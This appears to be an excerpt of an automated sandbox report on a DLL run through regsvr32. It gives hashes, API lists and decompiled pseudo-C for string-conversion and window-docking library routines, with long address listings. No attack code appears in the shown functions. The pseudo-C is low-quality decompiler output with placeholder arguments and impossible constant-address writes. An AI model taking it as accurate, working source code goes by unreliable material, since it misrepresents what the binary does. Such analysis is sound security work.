                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Brush
                                                                              • String ID:
                                                                              • API String ID: 2798902688-0
                                                                              • Opcode ID: ed3796b2eb400cc4cf48fa7f9b97ca1c14a194923f5e591c6856332069d85588
                                                                              • Instruction ID: 0a9509cd09602fa30259a2d9a9049a6c29b124937e59d989c3f52cbcbd10efa4
                                                                              • Opcode Fuzzy Hash: ed3796b2eb400cc4cf48fa7f9b97ca1c14a194923f5e591c6856332069d85588
                                                                              • Instruction Fuzzy Hash: 7AF0BD79A10704C7FB555F70E8683AC36A5F78CB19F021629CA8647394DFBDC4D59B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10053900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 20registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Version$MessageRegisterWindow
                                                                              • String ID: MSWHEEL_ROLLMSG
                                                                              • API String ID: 303823969-2485103130
                                                                              • Opcode ID: 9674b28b9420165cdacc516857faee3d09a4f6faa7423db13d0b91a09d4a900d
                                                                              • Instruction ID: 5ccae0d27672416afb421b870e3135bc57824db83890f979c187d66ae458d4ef
                                                                              • Opcode Fuzzy Hash: 9674b28b9420165cdacc516857faee3d09a4f6faa7423db13d0b91a09d4a900d
                                                                              • Instruction Fuzzy Hash: E7E0E5B4A0088287FA42AB68FC4A3C82364F708B19FE38410C1C785161EFFC44DE8A11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004D710 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 28%
                                                                              			E1004D710(signed long long __edx, void* __esi, long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, long long __r12, long long __r13, signed long long __r14, long long __r15) {
				signed long long _t60;
				void* _t61;
				int _t62;
				void* _t63;
				int _t66;
				signed long long _t69;
				void* _t70;
				long _t75;
				signed long long _t76;
				signed long long _t77;
				signed long long _t79;
				signed long long _t91;
				signed long long _t94;
				signed long long _t95;
				signed long long _t98;
				void* _t102;
				void* _t104;
				signed long long _t105;
				void* _t106;
				void* _t114;
				signed long long _t116;
				intOrPtr* _t118;
				signed long long _t120;
				signed long long _t121;
				void* _t122;
				void* _t123;
				void* _t131;
				void* _t133;
				void* _t134;
				signed long long _t138;
				signed long long _t140;
				signed long long _t141;
				int _t143;

				_t141 = __r14;
				_t134 = __r11;
				_t133 = __r10;
				_t96 = __rbx;
				_t123 = _t122 - 0xa0;
				_t121 = _t123 + 0x40;
				 *((long long*)(_t121 + 0x58)) = __rbx;
				 *((long long*)(_t121 + 0x50)) = __rsi;
				 *((long long*)(_t121 + 0x48)) = __rdi;
				 *((long long*)(_t121 + 0x40)) = __r12;
				 *((long long*)(_t121 + 0x38)) = __r13;
				 *((long long*)(_t121 + 0x30)) = __r14;
				 *((long long*)(_t121 + 0x28)) = __r15;
				_t91 =  *0x1006f4c8; // 0x6f13091946cb
				_t92 = _t91 ^ _t121;
				 *(_t121 + 0x18) = _t92;
				_t138 = r9d;
				_t114 = __r8;
				_t76 = __edx;
				 *_t121 = __edx;
				_t118 = __rcx;
				 *((long long*)(_t121 + 0x10)) = __rcx;
				if(r13d < 0xffffffff) {
					L53:
					__eflags = 0;
					L54:
					return E10038D20(_t79,  *(_t121 + 0x18) ^ _t121);
				}
				_t60 =  *0x10075c00; // 0x0
				if(_t60 != 0) {
					L7:
					__eflags = _t60 - 1;
					if(_t60 != 1) {
						__eflags = _t60 - 2;
						if(_t60 == 2) {
							L11:
							r12d =  *(_t121 + 0xa0);
							r14d = 0;
							__eflags = r12d;
							r15d = r14d;
							if(r12d == 0) {
								_t92 =  *_t118;
								r12d =  *(_t92 + 0x14);
							}
							_t77 =  *(_t121 + 0x98);
							__eflags = _t77;
							if(_t77 == 0) {
								_t92 =  *_t118;
								_t77 =  *(_t92 + 4);
							}
							_t61 = E100506C0(_t131);
							__eflags = _t77 - _t61;
							if(_t77 != _t61) {
								__eflags = _t61 - 0xffffffff;
								_t77 =  !=  ? _t61 : _t77;
							}
							 *(_t123 + 0x38) = _t141;
							 *(_t123 + 0x30) = _t141;
							r9d = r13d;
							_t79 = _t77;
							 *(_t123 + 0x28) = r14d;
							 *(_t123 + 0x20) = _t141;
							_t62 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
							__eflags = _t62;
							_t143 = _t62;
							if(__eflags == 0 || __eflags <= 0) {
								goto L53;
							} else {
								__eflags = _t143 - 0xffffffe0;
								if(_t143 > 0xffffffe0) {
									goto L53;
								}
								_t21 = _t143 + 0x10; // 0x10
								_t102 = _t21;
								__eflags = _t102 - 0x400;
								if(_t102 > 0x400) {
									_t63 = E10039550(_t92, _t96, _t102, _t114, _t118);
									__eflags = _t92;
									_t120 = _t92;
									if(_t92 == 0) {
										L28:
										__eflags = _t120;
										if(_t120 == 0) {
											goto L53;
										}
										E1003A240(_t63, _t79, 0, _t120, 0xfffffff0, _t143);
										r9d = r13d;
										 *(_t123 + 0x38) = _t92;
										 *(_t123 + 0x30) = _t92;
										_t79 = _t77;
										 *(_t123 + 0x28) = r14d;
										 *(_t123 + 0x20) = _t120;
										_t66 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
										__eflags = _t66;
										if(_t66 == 0) {
											L50:
											__eflags =  *((intOrPtr*)(_t120 - 0x10)) - 0xdddd;
											_t48 = _t120 - 0x10; // -16
											_t104 = _t48;
											if( *((intOrPtr*)(_t120 - 0x10)) == 0xdddd) {
												E10039620(_t92, _t104);
											}
											goto L54;
										}
										_t28 = _t143 + 1; // 0x1
										_t69 = _t28;
										__eflags = _t69;
										if(_t69 <= 0) {
											goto L50;
										}
										_t105 = _t69;
										_t92 = 0xfffffff0;
										__eflags = _t105 - 0xfffffff0;
										if(_t105 > 0xfffffff0) {
											goto L50;
										}
										_t106 = _t105 + _t105 + 0x10;
										__eflags = _t106 - 0x400;
										if(_t106 > 0x400) {
											_t70 = E10039550(0xfffffff0, _t96, _t106, _t114, _t120);
											__eflags = 0xfffffff0;
											_t116 = 0xfffffff0;
											if(0xfffffff0 == 0) {
												L40:
												__eflags = _t116;
												if(_t116 == 0) {
													goto L50;
												}
												__eflags = r12d;
												if(r12d == 0) {
													_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10))));
													r12d =  *( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)))) + 0x14);
												}
												_t98 = _t138;
												_t140 = _t138 + _t138;
												__eflags = _t140;
												r9d = r14d;
												_t79 = r12d;
												 *((short*)(_t140 + _t116)) = 0xffff;
												 *((short*)(_t116 + _t98 * 2 - 2)) = 0xffff;
												 *(_t123 + 0x20) = _t116;
											}
											 *0xfffffff0 = 0xdddd;
											L39:
											_t116 = _t116 + 0x10;
											__eflags = _t116;
											goto L40;
										}
										_t94 = _t106 + 0xf;
										__eflags = _t94 - _t106;
										if(_t94 <= _t106) {
											_t94 = 0xfffffff0;
										}
										_t92 = _t94 & 0xfffffff0;
										_t70 = E100534D0(_t69, _t92, _t133, _t134);
										_t123 = _t123 - _t92;
										_t116 = _t123 + 0x40;
										__eflags = _t116;
										if(_t116 == 0) {
											goto L50;
										} else {
											 *_t116 = 0xcccc;
											goto L39;
										}
									}
									 *_t92 = 0xdddd;
									L27:
									_t120 = _t120 + 0x10;
									__eflags = _t120;
									goto L28;
								}
								_t22 = _t102 + 0xf; // 0x1f
								_t95 = _t22;
								__eflags = _t95 - _t102;
								if(_t95 <= _t102) {
									_t95 = 0xfffffff0;
								}
								_t92 = _t95 & 0xfffffff0;
								_t63 = E100534D0(_t62, _t92, _t133, _t134);
								_t123 = _t123 - _t92;
								_t120 = _t123 + 0x40;
								__eflags = _t120;
								if(_t120 == 0) {
									goto L53;
								} else {
									 *_t120 = 0xcccc;
									goto L27;
								}
							}
						}
						__eflags = _t60;
						if(_t60 != 0) {
							goto L53;
						}
						goto L11;
					}
					L8:
					r8d = r13d;
					_t79 = _t76;
					GetStringTypeW(??, ??, ??, ??);
					goto L54;
				}
				r8d = 1;
				_t131 = _t121 + 4;
				_t79 = r8d;
				if(GetStringTypeW(??, ??, ??, ??) == 0) {
					_t75 = GetLastError();
					__eflags = _t75 - 0x78;
					if(_t75 != 0x78) {
						_t60 =  *0x10075c00; // 0x0
						goto L7;
					}
					 *0x10075c00 = 2;
					goto L11;
				}
				 *0x10075c00 = 1;
				goto L8;
			}




































                                                                              0x1004d710
                                                                              0x1004d710
                                                                              0x1004d710
                                                                              0x1004d710
                                                                              0x1004d712
                                                                              0x1004d719
                                                                              0x1004d71e
                                                                              0x1004d722
                                                                              0x1004d726
                                                                              0x1004d72a
                                                                              0x1004d72e
                                                                              0x1004d732
                                                                              0x1004d736
                                                                              0x1004d73a
                                                                              0x1004d741
                                                                              0x1004d744
                                                                              0x1004d748
                                                                              0x1004d74b
                                                                              0x1004d74e
                                                                              0x1004d754
                                                                              0x1004d757
                                                                              0x1004d75a
                                                                              0x1004d75e
                                                                              0x1004da0e
                                                                              0x1004da0e
                                                                              0x1004da10
                                                                              0x1004da3d
                                                                              0x1004da3d
                                                                              0x1004d764
                                                                              0x1004d76c
                                                                              0x1004d7b5
                                                                              0x1004d7b5
                                                                              0x1004d7b8
                                                                              0x1004d7d4
                                                                              0x1004d7d7
                                                                              0x1004d7e1
                                                                              0x1004d7e1
                                                                              0x1004d7e8
                                                                              0x1004d7eb
                                                                              0x1004d7ee
                                                                              0x1004d7f1
                                                                              0x1004d7f3
                                                                              0x1004d7f6
                                                                              0x1004d7f6
                                                                              0x1004d7fa
                                                                              0x1004d800
                                                                              0x1004d802
                                                                              0x1004d804
                                                                              0x1004d807
                                                                              0x1004d807
                                                                              0x1004d80d
                                                                              0x1004d812
                                                                              0x1004d814
                                                                              0x1004d816
                                                                              0x1004d819
                                                                              0x1004d819
                                                                              0x1004d81c
                                                                              0x1004d821
                                                                              0x1004d826
                                                                              0x1004d82e
                                                                              0x1004d830
                                                                              0x1004d835
                                                                              0x1004d83a
                                                                              0x1004d840
                                                                              0x1004d842
                                                                              0x1004d845
                                                                              0x00000000
                                                                              0x1004d851
                                                                              0x1004d851
                                                                              0x1004d855
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d85b
                                                                              0x1004d85b
                                                                              0x1004d869
                                                                              0x1004d870
                                                                              0x1004d8a0
                                                                              0x1004d8a5
                                                                              0x1004d8a8
                                                                              0x1004d8ab
                                                                              0x1004d8b7
                                                                              0x1004d8b7
                                                                              0x1004d8ba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d8c8
                                                                              0x1004d8cf
                                                                              0x1004d8d2
                                                                              0x1004d8d7
                                                                              0x1004d8e1
                                                                              0x1004d8e3
                                                                              0x1004d8e8
                                                                              0x1004d8ed
                                                                              0x1004d8f3
                                                                              0x1004d8f5
                                                                              0x1004d9f7
                                                                              0x1004d9f7
                                                                              0x1004d9fe
                                                                              0x1004d9fe
                                                                              0x1004da02
                                                                              0x1004da04
                                                                              0x1004da04
                                                                              0x00000000
                                                                              0x1004da09
                                                                              0x1004d8fb
                                                                              0x1004d8fb
                                                                              0x1004d8ff
                                                                              0x1004d901
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d907
                                                                              0x1004d90a
                                                                              0x1004d914
                                                                              0x1004d917
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d91d
                                                                              0x1004d922
                                                                              0x1004d929
                                                                              0x1004d960
                                                                              0x1004d965
                                                                              0x1004d968
                                                                              0x1004d96b
                                                                              0x1004d977
                                                                              0x1004d977
                                                                              0x1004d97a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d97c
                                                                              0x1004d97f
                                                                              0x1004d985
                                                                              0x1004d988
                                                                              0x1004d988
                                                                              0x1004d98f
                                                                              0x1004d992
                                                                              0x1004d992
                                                                              0x1004d995
                                                                              0x1004d99b
                                                                              0x1004d99e
                                                                              0x1004d9a6
                                                                              0x1004d9ad
                                                                              0x1004d9ad
                                                                              0x1004d96d
                                                                              0x1004d973
                                                                              0x1004d973
                                                                              0x1004d973
                                                                              0x00000000
                                                                              0x1004d973
                                                                              0x1004d92b
                                                                              0x1004d92f
                                                                              0x1004d932
                                                                              0x1004d934
                                                                              0x1004d934
                                                                              0x1004d93e
                                                                              0x1004d942
                                                                              0x1004d947
                                                                              0x1004d94a
                                                                              0x1004d94f
                                                                              0x1004d952
                                                                              0x00000000
                                                                              0x1004d958
                                                                              0x1004d958
                                                                              0x00000000
                                                                              0x1004d958
                                                                              0x1004d952
                                                                              0x1004d8ad
                                                                              0x1004d8b3
                                                                              0x1004d8b3
                                                                              0x1004d8b3
                                                                              0x00000000
                                                                              0x1004d8b3
                                                                              0x1004d872
                                                                              0x1004d872
                                                                              0x1004d876
                                                                              0x1004d879
                                                                              0x1004d87b
                                                                              0x1004d87b
                                                                              0x1004d87e
                                                                              0x1004d882
                                                                              0x1004d887
                                                                              0x1004d88a
                                                                              0x1004d88f
                                                                              0x1004d892
                                                                              0x00000000
                                                                              0x1004d898
                                                                              0x1004d898
                                                                              0x00000000
                                                                              0x1004d898
                                                                              0x1004d892
                                                                              0x1004d845
                                                                              0x1004d7d9
                                                                              0x1004d7db
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004d7db
                                                                              0x1004d7ba
                                                                              0x1004d7c1
                                                                              0x1004d7c7
                                                                              0x1004d7c9
                                                                              0x00000000
                                                                              0x1004d7c9
                                                                              0x1004d76e
                                                                              0x1004d774
                                                                              0x1004d77f
                                                                              0x1004d78a
                                                                              0x1004d798
                                                                              0x1004d79e
                                                                              0x1004d7a1
                                                                              0x1004d7af
                                                                              0x00000000
                                                                              0x1004d7af
                                                                              0x1004d7a3
                                                                              0x00000000
                                                                              0x1004d7a3
                                                                              0x1004d78c
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 319667368-0
                                                                              • Opcode ID: ee2d0e9a66c096e79b9cd819a891d4be06eed9b30623fc049aa5be5000ed3314
                                                                              • Instruction ID: e8f5a748c89b3333a59e118e64bc4194d92dec4565b5c7f39d5a715cde6ae193
                                                                              • Opcode Fuzzy Hash: ee2d0e9a66c096e79b9cd819a891d4be06eed9b30623fc049aa5be5000ed3314
                                                                              • Instruction Fuzzy Hash: F8819F32304B808ADB25EF25D84079933A5F748BE8F61472AEEAD87BD4EB74C955C704
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10017DBC Relevance: 9.2, APIs: 6, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E10017DBC(void* __ebx, void* __esi, void* __ebp, long long __rcx, long long __rdx, long long __r8, void* __r12, void* __r13, void* __r14, void* __r15) {
				signed int _v56;
				char _v584;
				char _v600;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				signed int _v644;
				signed int _v648;
				intOrPtr _v664;
				signed int _v672;
				void* _v680;
				signed char _t69;
				signed short _t71;
				signed long long _t72;
				void* _t104;
				void* _t107;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t117;
				signed long long _t128;
				signed long long _t138;
				signed long long _t139;
				long long _t140;
				long long _t164;
				long long _t171;
				long long _t172;
				signed long long _t173;
				intOrPtr _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;

				_t182 = __r15;
				_t181 = __r14;
				_t180 = __r13;
				_t179 = __r12;
				_t175 = __r8;
				_t164 = __rdx;
				_t117 = __ebp;
				_t116 = __esi;
				_t104 = __ebx;
				_t174 =  &_v680;
				_t138 =  *0x1006f4c8; // 0x6f13091946cb
				_t139 = _t138 ^  &_v680;
				_v56 = _t139;
				_t140 = __r8;
				_t172 = __rdx;
				_t171 = __rcx;
				if(__rcx == 0) {
					E10016544();
					asm("int3");
				}
				if(_t164 == 0) {
					E10016544();
					asm("int3");
				}
				_t165 =  &_v624;
				GetWindowRect(??, ??);
				if( *((intOrPtr*)(_t172 + 0xf0)) != _t171) {
					L7:
					if( *((intOrPtr*)(_t171 + 0x100)) != 0 && ( *(_t172 + 0xe0) & 0x00000040) != 0) {
						 *(_t171 + 0xdc) =  *(_t171 + 0xdc) | 0x00000040;
					}
					 *(_t171 + 0xdc) =  *(_t171 + 0xdc) & 0xfffffff9;
					_t69 =  *(_t172 + 0xdc) & 0x00000006 |  *(_t171 + 0xdc);
					 *(_t171 + 0xdc) = _t69;
					if((_t69 & 0x00000040) == 0) {
						r8d = 0x104;
						E100162F4(_t107, _t116, _t139, _t172,  &_v584, _t175, _t176);
						_t165 =  &_v584;
						E10029A2C(_t105,  *((intOrPtr*)(_t171 + 0x40)),  &_v584, _t175, _t176);
					}
					_t112 = ( *(_t172 + 0xdc) ^  *(_t171 + 0xdc)) & 0x0000f000 ^  *(_t172 + 0xdc) | 0x00000f00;
					_t127 =  *((intOrPtr*)(_t171 + 0x100));
					if( *((intOrPtr*)(_t171 + 0x100)) == 0) {
						_t113 = _t112 & 0xfffffffe;
						__eflags = _t112 & 0xfffffffe;
					} else {
						_t113 = _t112 | 0x00000001;
					}
					E1001846C(_t113, _t127, _t139, _t172);
					_t71 = GetDlgCtrlID(??);
					r8d = 0xffffffff;
					_t114 = _t71 & 0x0000ffff;
					_t72 = E10016A60(_t104, _t114, _t171, _t165, _t176, _t177);
					_t128 = _t72;
					_t173 = _t72;
					if(_t128 <= 0) {
						L19:
						_t130 = _t140;
						if(_t140 == 0) {
							goto L24;
						} else {
							CopyRect();
							_t165 =  &_v648;
							E1000C7AC(_t130, _t171,  &_v648);
							if(_t117 < 1) {
								asm("movaps xmm0, [esp+0x40]");
								_t175 =  &_v600;
								asm("movdqa [esp+0x70], xmm0");
								asm("cdq");
								_v632 = (_v640 - _v648 - _t114 >> 1) + _v648;
								asm("cdq");
								_t165 = _t172;
								_v628 = (_v636 - _v644 - _t114 >> 1) + _v644;
								_t176 = _v632;
								E10016AF0(_t104, _t139, _t171, _t172,  &_v600, _t176);
							}
							r9d = _v644;
							r8d = _v648;
							_t105 = _v636 - r9d;
							_v664 = 0x114;
							_v672 = _v636 - r9d;
							_v680 = _v640 - r8d;
						}
					} else {
						if(_t128 < 0 || _t173 >=  *((intOrPtr*)(_t171 + 0x118))) {
							E10016544();
							asm("int3");
							L24:
							__eflags = _t117 - 1;
							if(_t117 < 1) {
								_t175 = _t172;
								E1002D704(_t105, _t114, _t139, _t171 + 0x108,  *((intOrPtr*)(_t171 + 0x118)), _t172);
								_t165 =  *((intOrPtr*)(_t171 + 0x118));
								r8d = 0;
								__eflags = r8d;
								E1002D704(_t105, _t114, _t139, _t171 + 0x108,  *((intOrPtr*)(_t171 + 0x118)), _t172);
							}
							r9d =  *0x10074c94; // 0x2
							r8d =  *0x10074c90; // 0x2
							_v664 = 0x115;
							r9d =  ~r9d;
							_v672 = 0;
							_v680 = 0;
							r8d =  ~r8d;
						} else {
							 *((long long*)( *((intOrPtr*)(_t171 + 0x110)) + _t173 * 8)) = _t172;
							goto L19;
						}
					}
					E1001621C(_t172, _t165);
					GetParent(??);
					E10011808(_t104, 0, _t139, _t139, _t165, _t175, _t176, _t178);
					if(_t139 != _t171) {
						SetParent();
						E10011808(_t104, 0, _t139, _t139,  *((intOrPtr*)(_t171 + 0x40)), _t175, _t176, _t178);
					}
					_t149 =  *((intOrPtr*)(_t172 + 0xf0));
					if( *((intOrPtr*)(_t172 + 0xf0)) != 0) {
						r9d = 0;
						_t61 = _t176 - 1; // -1
						r8d = _t61;
						E10017064(_t104, 0, _t139, _t149, _t172, _t176, _t179, _t180, _t181, _t182);
					}
					 *((long long*)(_t172 + 0xf0)) = _t171;
					E1001D2FC(_t139, _t171);
					 *(_t139 + 0x170) =  *(_t139 + 0x170) | 0x0000000c;
				} else {
					if(_t140 != 0) {
						_t165 = _t140;
						if(EqualRect(??, ??) == 0) {
							goto L7;
						}
					}
				}
				return E10038D20(_t105, _v56 ^ _t174);
			}








































                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dbc
                                                                              0x10017dc1
                                                                              0x10017dc8
                                                                              0x10017dcf
                                                                              0x10017dd2
                                                                              0x10017ddd
                                                                              0x10017de0
                                                                              0x10017de3
                                                                              0x10017de6
                                                                              0x10017de8
                                                                              0x10017ded
                                                                              0x10017ded
                                                                              0x10017df1
                                                                              0x10017df3
                                                                              0x10017df8
                                                                              0x10017df8
                                                                              0x10017dfd
                                                                              0x10017e02
                                                                              0x10017e0f
                                                                              0x10017e30
                                                                              0x10017e37
                                                                              0x10017e42
                                                                              0x10017e42
                                                                              0x10017e49
                                                                              0x10017e59
                                                                              0x10017e61
                                                                              0x10017e67
                                                                              0x10017e71
                                                                              0x10017e7a
                                                                              0x10017e83
                                                                              0x10017e8b
                                                                              0x10017e8b
                                                                              0x10017ea8
                                                                              0x10017eae
                                                                              0x10017eb5
                                                                              0x10017ebc
                                                                              0x10017ebc
                                                                              0x10017eb7
                                                                              0x10017eb7
                                                                              0x10017eb7
                                                                              0x10017ec2
                                                                              0x10017ecb
                                                                              0x10017ed1
                                                                              0x10017eda
                                                                              0x10017edd
                                                                              0x10017ee2
                                                                              0x10017ee4
                                                                              0x10017ee7
                                                                              0x10017f07
                                                                              0x10017f07
                                                                              0x10017f0a
                                                                              0x00000000
                                                                              0x10017f10
                                                                              0x10017f18
                                                                              0x10017f1e
                                                                              0x10017f26
                                                                              0x10017f2e
                                                                              0x10017f34
                                                                              0x10017f39
                                                                              0x10017f45
                                                                              0x10017f4b
                                                                              0x10017f54
                                                                              0x10017f60
                                                                              0x10017f63
                                                                              0x10017f6c
                                                                              0x10017f70
                                                                              0x10017f75
                                                                              0x10017f75
                                                                              0x10017f7e
                                                                              0x10017f87
                                                                              0x10017f8c
                                                                              0x10017f8f
                                                                              0x10017f9a
                                                                              0x10017f9e
                                                                              0x10017f9e
                                                                              0x10017ee9
                                                                              0x10017ee9
                                                                              0x10017fa4
                                                                              0x10017fa9
                                                                              0x10017faa
                                                                              0x10017faa
                                                                              0x10017fad
                                                                              0x10017fbd
                                                                              0x10017fc0
                                                                              0x10017fc5
                                                                              0x10017fd3
                                                                              0x10017fd3
                                                                              0x10017fd6
                                                                              0x10017fd6
                                                                              0x10017fdb
                                                                              0x10017fe2
                                                                              0x10017fe9
                                                                              0x10017ff1
                                                                              0x10017ff4
                                                                              0x10017ffc
                                                                              0x10018004
                                                                              0x10017efc
                                                                              0x10017f03
                                                                              0x00000000
                                                                              0x10017f03
                                                                              0x10017ee9
                                                                              0x1001800c
                                                                              0x10018015
                                                                              0x1001801e
                                                                              0x10018026
                                                                              0x10018030
                                                                              0x10018039
                                                                              0x10018039
                                                                              0x1001803e
                                                                              0x10018048
                                                                              0x1001804a
                                                                              0x10018050
                                                                              0x10018050
                                                                              0x10018054
                                                                              0x10018054
                                                                              0x1001805c
                                                                              0x10018063
                                                                              0x10018068
                                                                              0x10017e11
                                                                              0x10017e14
                                                                              0x10017e1f
                                                                              0x10017e2a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10017e2a
                                                                              0x10017e14
                                                                              0x1001808a

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$ParentWindow$CopyCtrlEqual
                                                                              • String ID:
                                                                              • API String ID: 1662903855-0
                                                                              • Opcode ID: eba5169207c1228c58988fa756856d08b35fc34baaf7eb5ce4e75d829e218d06
                                                                              • Instruction ID: 8bd8b70440c58969f5b92b5505b9adb399f691e1aecf70ba5ad0befa9a9b202b
                                                                              • Opcode Fuzzy Hash: eba5169207c1228c58988fa756856d08b35fc34baaf7eb5ce4e75d829e218d06
                                                                              • Instruction Fuzzy Hash: 4461F2363046C58BEB19CB25E9417AEB7B1FB897C4F004125EB9A4BA18DF3CE485CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004C050 Relevance: 9.2, APIs: 6, Instructions: 167COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E1004C050(int __edx, long long __rbx, intOrPtr* __rcx, signed long long __rdi, long long __rsi, signed long long __r8, void* __r10, void* __r11, long long __r12, long long __r13, long long __r14, long long __r15) {
				int _t47;
				int _t48;
				int _t56;
				void* _t57;
				int _t59;
				int _t65;
				void* _t72;
				int _t76;
				int _t77;
				int _t78;
				int _t83;
				signed long long _t93;
				signed long long _t94;
				signed long long _t97;
				signed long long _t101;
				void* _t106;
				void* _t108;
				signed long long _t111;
				signed long long _t116;
				void* _t118;
				void* _t119;
				signed long long _t127;
				void* _t130;
				void* _t131;
				intOrPtr* _t133;
				int _t135;
				signed long long _t139;

				_t141 = __r15;
				_t136 = __r13;
				_t131 = __r11;
				_t130 = __r10;
				_t113 = __rsi;
				_t111 = __rdi;
				_t99 = __rbx;
				 *((intOrPtr*)(_t118 + 0x20)) = r9d;
				_t119 = _t118 - 0x80;
				_t116 = _t119 + 0x30;
				 *((long long*)(_t116 + 0x48)) = __rbx;
				 *((long long*)(_t116 + 0x40)) = __rsi;
				 *((long long*)(_t116 + 0x38)) = __rdi;
				 *((long long*)(_t116 + 0x30)) = __r12;
				 *((long long*)(_t116 + 0x28)) = __r13;
				 *((long long*)(_t116 + 0x20)) = __r14;
				 *((long long*)(_t116 + 0x18)) = __r15;
				_t93 =  *0x1006f4c8; // 0x6f13091946cb
				_t94 = _t93 ^ _t116;
				 *(_t116 + 8) = _t94;
				_t47 =  *0x10075be8; // 0x1
				_t139 = __r8;
				r15d = __edx;
				_t133 = __rcx;
				if(_t47 != 0) {
					L12:
					if(_t47 == 2 || _t47 == 0) {
						goto L5;
					} else {
						if(_t47 != 1) {
							goto L10;
						} else {
							goto L15;
						}
					}
				} else {
					r8d = 1;
					_t127 = _t116;
					_t67 = r8d;
					if(GetStringTypeW(??, ??, ??, ??) == 0) {
						if(GetLastError() != 0x78) {
							_t47 =  *0x10075be8; // 0x1
							goto L12;
						} else {
							 *0x10075be8 = 2;
							L5:
							_t77 =  *(_t116 + 0x90);
							if(_t77 == 0) {
								_t94 =  *_t133;
								_t77 =  *(_t94 + 0x14);
							}
							_t65 =  *(_t116 + 0x88);
							if(_t65 == 0) {
								_t94 =  *_t133;
								_t65 =  *(_t94 + 4);
							}
							_t67 = _t77;
							_t48 = E100506C0(_t127);
							if(_t48 != 0xffffffff) {
								if(_t48 == _t65) {
									L37:
									_t95 =  *((intOrPtr*)(_t116 + 0x80));
